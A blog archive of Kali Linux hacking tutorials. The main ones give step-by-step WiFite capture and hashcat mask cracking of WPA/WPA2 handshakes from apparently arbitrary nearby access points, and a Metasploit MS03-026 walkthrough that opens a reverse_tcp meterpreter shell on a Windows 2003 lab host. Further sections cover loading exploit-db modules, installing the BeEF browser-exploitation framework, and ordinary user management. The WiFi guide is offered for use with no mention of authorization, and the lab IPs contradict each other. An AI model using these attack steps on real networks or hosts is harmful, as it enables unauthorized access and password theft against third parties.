Category Archives: KALI LINUX

CRACKING WiFi WPA WPA2 WITH HASHCAT ON KALI LINUX (BRUTEFORCE MASK BASED ATTACK ON WIFI PASSWORDS)

Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords)

cudaHashcat or oclHashcat or Hashcat on Kali Linux got built-in capabilities to attack and decrypt or crack WPA WPA2 handshake.cap files. Only constraint is, you need to convert a .cap file to a.hccap file format. This is rather easy.

Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux including injection and monitor mode etc. A list can be found in802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you’ll be just wasting time and effort on something that just won’t do the job.
[toc]

My Setup

I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux.

I will use cudahashcat command because I am using a NVIDIA GPU. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumptions is incorrect.

Why use Hashcat to crack WPA/WPA2 handshake file?

Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files?

  1. Because we can?
  2. Because Hashcat allows us to use customized attacks with predefined rules and Masks.

Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up.

Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file.

Built-in charsets

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !”#$%&'()*+,-./:;⇔?@[]^_`{|}~

?a = ?l?u?d?s

Numbered passwords

So lets say you password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d

What it means is that you’re trying to break a 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea.

Letter passwords – All uppercase

If your password is all letters in CAPS such as: ABCFEFGH orLKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK:

?u?u?u?u?u?u?u?u

It will crack all 8 Letter passwords in CAPS.

Letter passwords – All lowercase

If your password is all letters in lowercase such as: abcdefgh ordfghpoiu or bnmiopty..etc. then you can use the following MASK:

?l?l?l?l?l?l?l?l

It will crack all 8 Letter passwords in lowercase. I hope you now know where I am getting at.

Passwords – Lowercase letters and numbers

If you know your password is similar to this: a1b2c3d4 or p9o8i7u6or n4j2k5l6 …etc. then you can use the following MASK:

?l?d?l?d?l?d?l?d

Passwords – Uppercase letters and numbers

If you know your password is similar to this: A1B2C3D4 or P9O8I7U6or N4J2K5L6 …etc. then you can use the following MASK:

?u?d?u?d?u?d?u?d

Passwords – Mixed matched with uppercase, lowercase, number and special characters.

If you password is all random, then you can just use a MASK like the following:

?a?a?a?a?a?a?a?a

Note: ?a represents anything …. I hope you’re getting the idea.

If you are absolutely not sure, you can just use any of the predefined MASKs file and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario.

Passwords – when you know a few characters

If you somehow know the few characters in the password, this will make things a lot faster. For every known letter, you save immense amount of computing time. MASK’s allows you to combine this. Let’s say your 8 character password starts with abc, doesn’t contain any special characters. Then you can create a MASK rule file to contain the following:

abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l

There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords.

You can even up your system if you know how a person combines a password. Some people always uses UPPERCASE as the first character in their passwords, few lowercase letters and finishes with numbers.

ExampleAbcde123

Your mask will be:

?u?l?l?l?l?d?d?d

This will make cracking significantly faster. Social engineering is the key here.

That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files.

Capture handshake with WiFite

Why WiFite instead of other guides that uses Aircrack-ng? Because we don’t have to type in commands..

Type in the following command in your Kali Linux terminal:

wifite –wpa

You could also type in

wifite wpa2

If you want to see everything, (wepwpa or wpa2, just type the following command. It doesn’t make any differences except few more minutes

wifite

Once you type in following is what you’ll see.

1 - Wifite - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

So, we can see bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below

2 - Wifite Screen - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Awesome, we’ve got few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all.

So I’ve picked 1 and 2. Press Enter to let WiFite do it’s magic.

3 - WiFite Choice - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Once you press ENTER, following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it.

This is actually a great feature of WIfite. It now asks me,

What do you want to do?

  1. [c]ontinue attacking targets
  2. [e]xit completely.

I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or AP’s or targets will respond to an attack the similar way. You could of course wait and eventually get a respond, but if you’re just after ANY AP’s, it just saves time.

4 - WiFite continue - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

And voila, took it only few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake.

This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file.

Once the capture is complete and there’s no more AP’s to attack, Wifite will just quit and you get your prompt back.

5 - WiFite captured handshake - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Now that we have a capture file with handshake on it, we can do a few things.

Cleanup your cap file using wpaclean

Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand.

Here’s how to do it:

To convert your .cap files manually in Kali Linux, use the following command

wpaclean <out.cap> <in.cap>

Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion.

In my case, the command is as follows:

wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap

Convert .cap file to .hccap format

We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand.

To convert it to .hccap format with “aircrack-ng” we need to use the -J option

aircrack-ng <out.cap> -J <out.hccap>

Note the -J is a capitol J not lower case j.

In my case, the command is as follows:

aircrack-ng hs/out.cap -J hs/out

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 1

Cracking WPA/WPA2 handshake with Hashcat

cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios:

  1. Dictionary attack
  2. Mask attack

Dictionary attack

Grab some Wordlists, like Rockyou.

Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc.

First we need to find out which mode to use for WPA/WPA2 handshake file. I’ve covered this in great length in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linuxguide. Here’s a short rundown:

cudahashcat --help | grep WPA

So it’s 2500.

Now use the following command to start the cracking process:

cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 2

Bingo, I used a common password for this Wireless AP. Took me few seconds to crack it. Depending on your dictionary size, it might take a while.

You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. 🙂

Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length.

Brute-Force Attack

Now this is the main part of this guide. Using Brute Force MASK attack.

To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command:

Sample:

cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

Where -m = 2500 means we are attacking a WPA/WPA2 handshake file.

-a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack).

capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng.

?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678etc.

I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask.

/usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat:

ls /usr/share/oclhashcat/masks/

In my case, the command is as follows:

cudahashcat -m 2500 -a 3 /root/hs/out.hccap  /usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 3

Sample .hcmask file

You can check the content of a sample .hcmask file using the following command:

tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 4

Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip.

Location of Cracked passwords

Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory.

cat hashcat.pot

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 5

Advertisements

802.11 Recommended USB Wireless Cards for Kali Linux

802.11 Recommended USB Wireless Cards for Kali Linux

This post lists some of the best performing, supported and recommended USB Wireless Cards for Kali Linux.

There isn’t a “best” card. There is whatever is right for YOU.

Following recommended USB Wireless cards appears to be working for Kali Linux (i.e. monitor, injection etc.)

*Note* These are not in any type of order *Note*

A common problem in pentest distro such as Kali or BackTrack Linux is when users trying to use a card which is not supported or there just isn’t a supported driver. Most of the following cards are priced below $50USD and they take care of a massive headache and saves time to troubleshoot driver issues rather than investing time to actually do something. With each update these makeshift fixes seems to break old drivers and you end up doing the whole thing again and again. Following guide generated a lot of emails and personal request where users were not able to make it work properly just because their Wifi card wasn’t listed in the recommended wireless cards for Kali Linux.

2.4GHz

 

Rokland N3

http://store.rokland.com/products/th…b-for-macs-pcs

$32.97 off Rockland

 

Alfa AWUS036NHA

http://www.alfa.com.tw/products_show.php?pc=34&ps=20

$32.99 off Amazon

 

TP-Link WN722N

http://uk.tp-link.com/products/detai…TL-WN722N#spec

$15.18 off Amazon

 

Linksys WUSB54GC v1

http://support.linksys.com/en-us/support/adapters/WUSB54GC

25.00$ off Amazon

 

5GHz (& 2.4GHz)

 

Rosewill RNX-N600UBE

http://www.rosewill.com/products/182…ifications.htm

$32.66 off Amazon

 

Other useful links

As the price will change over time and from country to country, it’s missing on purpose. Places that have been known to stock the mentioned cards:

If you have a different card feel free to share here which will probably help another user someday.

Side Note:

I’ve compiled a small list (These are the only 8 laptops that I could find to match my personal choices) that are Linux compatible and have NVIDIA GeForce Graphics cards. (I’ve tried to avoid AMD/ATI as there’s been some inconsistency lately with their Linux proprietary drivers and heating issues, sorry AMD, take Linux users more seriously next time). NVIDIA seems more stable and gives you more options … Feel free to check this list and add comments about which one you have or prefer…

 

“No responsibility is taken for the correctness of this information.” == Double check before purchasing.

 

Conclusion

or maybe you would like to turn a Kindle Device in your Portable Kali installation ? The possibilities are endless …

HOW TO HACK WINDOWS 2003 SERVER WITH METASPLOIT

How to pentest Remote PC (Windows 2003 server) with Metasploits - blackMORE Ops

This is a a detailed step by step guide on How to pentest Remote PC (Windows 2003 server) with Metasploits. I’ve used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary and readers, sysadmins are advised to update their Windows 2003 server to the latest patch/service pack and use additional antivirus, firewalls to protect them from similar situation. The author takes no responsibility on how this tutorial is being used by readers and this is for educational purpose only.

Introduction

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

http://www.backtrack-linux.org/downloads/

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and the most preferred work area is the‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing in the command search along with the keyword lists out the various possible exploits that have that keyword pattern.
  2. show exploits : Typing in the command show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads.
  4. show options : Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘.
  6. use : This command tells Metasploit to use the exploit with the specified name
  7. set RHOST : This command will instruct Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
  10. set LPORT : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well.
  11. exploit : Actually exploits the service. Another version of exploit,rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console
  12. help : The ‘help’ command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003
IP: IP: 192.168.42.128

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev
IP: 192.168.42.128

Objective

The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server 192.168.42.129.
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Step 1 – Scan with nmap for open ports - blackMORE Ops

Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Step 2 – Open msfconsole - blackMORE Ops

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Step 2 – Open msfconsole-2 - blackMORE Ops

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.

Step 3 – Search RPC exploit in Metasploit - blackMORE Ops

Figure 4

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/or another alternative would be to use the “search” command in Metasploit to search for related exploits for RPC.
In msfconsole type “search dcerpc” to search all the exploits related todcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.

Step 3 – Search RPC exploit in Metasploit-2 - blackMORE Ops

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Step 4 – Gather info about target exploit - blackMORE Ops

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Step 5 – Activate exploit - blackMORE Ops

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST 192.168.42.129” and we see that the RHOST is set to 192.168.42.129

Step 6 – Configure exploit - blackMORE Ops

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Step 7 – Set payload for exploit - blackMORE Ops

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Step 7 – Set payload for exploit-2 - blackMORE Ops

Figure 10

We notice that the LHOST for out payload is not set, so we set it toout local IP ie. 192.168.42.128 using the command “set LHOST 192.168.42.128

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the Figure below, our selected exploit does not support the check option.

Step 8 – Launch exploit and establish connection - blackMORE Ops

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Step 8 – Launch exploit and establish connection-2 - blackMORE Ops

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the help command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Step 9 – Perform an action on pentested server - blackMORE Ops

Figure 13

Step 9 – Perform an action on pentested server-2 - blackMORE Ops

Add new exploits to Metasploit from Exploit-db

All this timeAll this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not the updated ones. Now it’s time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with strong antivirus and firewall can be pretty  hard to break into. Now we will move into the world of real pentesting, and the first step would be introduction to exploit-db.




Exploit-db

As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)

Some more

The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.
As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.
In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)


Now, what exploit db really is, is nothing more than a database where the pentestors who write an exploit for a vulnerability upload the source code of the exploit of other pentestors too see. It is maintained by Offensive Security (the force behind Backtrack, Kali, Metasploit Unleashed). The exploit-db.com site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough, as you need to add it to Metasploit in order to use it. 

Adobe Flash Player Shader Buffer Overflow

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)

Now the site suggest that the exploit can be found here.

exploit/windows/browser/adobe_flash_pixel_bender_bof

But using the command

use exploit/windows/browser/adobe_flash_pixel_bender_bof

shows that the exploit is not in Metasploit yet (chances are good it’s there if you update metasploit regularly or if you are reading this tutorial a long time after it was written. Either ways, the method will not differ even if the exploit is already there, so don’t worry. Also you can use a different exploit as per your liking, and just replace the name wherever you see it being used in commands)

Now, there are two alternates. First, update the metasploit framework using 

 

msfupdate

This will update the framework with new modules.

The second alternate the to download the exploit from exploit-db, then put it in the ~/.msf4/modules/exploit/<your_folder> directory. Any exploit put here will be detected my Metasploit when it starts. It will show up when you type use /exploit/your_folder/exploit_name. An important point here is while the <your_folder is arbitrary  and can be set to any value, it is recommended to use a proper directory structure. For example, this exploit should be placed in~/.msf4/modules/exploit/windows/browser/ directory .Also, it is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploit/ or you won’t be able to use it. For newbies in Linux, here is a detailed step by step guide.

Get the exploit

For examples sake, we’ll use the adobe shader exploit from http://www.exploit-db.com/exploits/33333/ Click on the Save icon to download the exploit. Save it on you Kali Desktop.

.msf4 directory method

Now if you are not well versed with linux, you will need help with creating the directory and placing files there. Although I’m guiding you how to do it, you should be proficient in linux usage and should be able to do the basic stuff like this atleast. So, you can either use the command to line create the directories or do it using the GUI.

Command line method

First, say hi to mkdir

mkdir –help
Usage: mkdir [OPTION]… DIRECTORY…
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, –mode=MODE   set file mode (as in chmod), not a=rwx – umask
  -p, –parents     no error if existing, make parent directories as needed
  -v, –verbose     print a message for each created directory
  -Z, –context=CTX  set the SELinux security context of each created
                      directory to CTX
      –help     display this help and exit
      –version  output version information and exit

First we’ll move to the already existent directory using (you need to be in root directory for this to work. Type just cd if unsure, it will automatically take you to root directory)root@kali:~# cd .msf4/modules/    
To see what the directory has, execute ls. It will return nothing as the directory is empty.

root@kali:~/.msf4/modules# ls
Now we’ll use mkdir to create what we need.
root@kali:~/.msf4/modules# mkdir exploits
root@kali:~/.msf4/modules# cd exploits
root@kali:~/.msf4/modules/exploits# mkdir windows        
root@kali:~/.msf4/modules/exploits# cd windows
root@kali:~/.msf4/modules/exploits/windows# mkdir browser
root@kali:~/.msf4/modules/exploits/windows# cp      
If you read the mkdir help thing, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as
root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser
Now meet cp
root@kali:~/.msf4/modules/exploits/windows# cp –help
Usage: cp [OPTION]… [-T] SOURCE DEST
  or:  cp [OPTION]… SOURCE… DIRECTORY
  or:  cp [OPTION]… -t DIRECTORY SOURCE…
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Assume you have adobe_flash_pixel_bender_bof.rb file on your desktop. Then use the following commands.
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows
root@kali:~# ls 
Desktop  app.apk
root@kali:~# cd Desktop
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser
Now check for yourself
root@kali:~# cd ~/.msf4/modules/exploits/windows/browser
root@kali:~/.msf4/modules/exploits/windows/browser# ls
adobe_flash_pixel_bender_bof.rb

GUI Method

Go to computer -> Filesystem->Home. Now you won’t see .msf4 there, because the . prefix is for hidden files. So go to view and select show hidden items. Now it will be visible.





Now the rest is going to be a piece of cake. Copy the exploit from desktop, and create the directories by using the easy peasy right click -> New folder method. After that just paste the file where it needs to be. You’ll be done. Now start msfconsole again or type reload_all to reload the module. This will add the module to metasploit and you can use it as you normally would.

How to add remove user (standard user/non-root) in Kali Linux?

Kali Linux – How to Add or Remove Users

This guide accomplishes:

The main reason I wanted to try this to demonstrate the followings:

  1. Add a user with all user directories already in place (thereby avoiding “Could not update .ICEauthority var/lib/gdm3/.ICEauthority” or any error containing .ICEauthority or permission in general.
  2. Add user to sudo group to allow him to use root commands. You can also add user to ‘lpadmin’ group to allow printing for Canonor HP and such.
  3. Change default shell from chsh to bash. Or any shell like Bourne Shell (sh), Bourne-Again Shell (bash), C Shell (csh) or Korn shell (ksh) etc.
  4. Login as that user and demonstrate there were no errors.
  5. Be able to use sudo and show groups affinity.
  6. Delete that user safely.

 

Benefits of Standard User in Kali:

Few benefits you have as non-root or standard user in Kali

  1. Install and run Google Chrome
  2. Install and run Gnome User and Groups manager (Install gnome-system-tools)
  3. Use Kali as Primary Operating System without worrying about breaking it all the time.

Now let’s move onto actual guide.

 

Add user in Kali Linux:

  • First of all let’s confirm which version of Linux and Kernel I’m running.In command prompt type in
    uname –a
    lsb_release –a

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -1

  • Now let’s add user. Open terminal and type following to create new user (replace user1 with your desired user name)
    useradd -m user1

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -2

    (Note: -m means create home directory which is usually /home/username)

  • Now set password for this user
    passwd user1

    Enter desired password twice

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -3

  • Add user to sudo group (to allow user to install software, allow printing, use privileged mode etc.)
    usermod -a -G sudo user1

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -4

    (Note: -a means append or add and –G mean to specified group/groups)

  • Change default shell of previously created user to bash
    chsh -s /bin/bash user1

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -5

    (Note: chsh mean change login shell, -s is the name of the specified shell you want for the user, in this case /bin/bash)

    Nice, all worked out as expected.
    Let’s logout and login back as our new Standard Non-root user (user1)

 

Login as new user

  • Once logged in, let’s confirm from command line who I really am! In terminal type in the following
    whoami

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -9

    Take note of user1@kali prompt. That also confirms who you are.

  • And let’s check my group affinity, type in the following in terminal:
    groups

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -10

    Looks good to me so far.

    I am part of user1 group (my primary) and sudo group. That means I can run privileged commands or just become root myself if required.

  • Become root!
    sudo su –

    and type in user1’s password to become root.

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -11

    See the prompt becomes root@kali instead of user1@kali. That means you’re now root and get to run anything Kali got to offer.

  • Lets confirm that using whoami command
    whoami

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -12

    So far so good. Now how do you delete a user?

 

Delete user in Kali Linux:

  • Log in as root user again. Open terminal and type:
    userdel –r user1

    (Note: -r means delete all files and home directory for user1)

    You can replace user1 with your desired user name.

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -13

    I have an error “user1 is currently used by process 5866”.

    So process ID 5866 is being used by user1. (I know that it’s the gnomekeyring process running in background when I used sudo su – command earlier. (GnomeKeyring error is quite common in Debian when you install multiple Windows or Desktop Managers.

    Let do that.

  • Type in the following in terminal to kill the process used by user1.
    kill -9 5866

    This kills the process immediately.

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -14

    (Note: don’t kill root or system processes unless you know what you’re doing)

  • Now let’s try to delete the user again.
    userdel –r user1

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -15

    We have a message. “userdel: user1 mail spool (/var/mail/user1) not found”.

    (Note: -r means delete all files and home directory for user1)

    Are we going to worry about it? Not really, we never created a mailbox for user1.

  • Just to confirm everything for user1 was deleted list files in home directory
    ls /home

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -16

    Nothing.. that’s good news, all files and folders were deleted for user1.

  • Want to double-check?
    su user1

    How to add remove user - Standard usernon-root - in Kali Linux - blackMORE Ops -17

    Perfect user1 was deleted successfully.

 

BEEF :- NEWEST WEAPON OF HACKERS

BeEF, the Browser Exploitation Framework, is a testing tool designed to enable penetration testers to launch client-side attacks against target browsers. By using techniques similar to common drive-by malware, testers can assess the security of a target’s internal environment, bypassing the hardened perimeter.

In this post, I’ll show you the quickest way to get up and running with BeEF using BackTrack or Kali Linux. Then we’ll explore the basic structure of the program. By the end of the post you should be able to begin using BeEF in your own testing.

In this guide I’ll be using Kali Linux, the penetration testing distribution created by the folks at Offensive Security. You can download an ISO or a VMWare image atwww.kali.org. The steps will also work for BackTrack, the previous incarnation of the distribution. For installation steps on other systems, check out the BeEF Wiki.

Installation on Kali is very simple. Since they’ve created a nice package we can simply use apt-get to install it. Just to make sure we’ve got the most recent version, we’ll update our package list first.

root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss

(Be sure you get beef-xss and not beef. The latter is a programming language interpreter.)

Since we’re depending on a package from the Kali maintainers, this method may not always get the most up-to-date version of BeEF. At the time of this post the package provides version 0.4.4.5 which is the most recent release. If you need a feature that isn’t yet available in the Kali package then you’ll need to follow the directions on the BeEF website to download & install it manually.

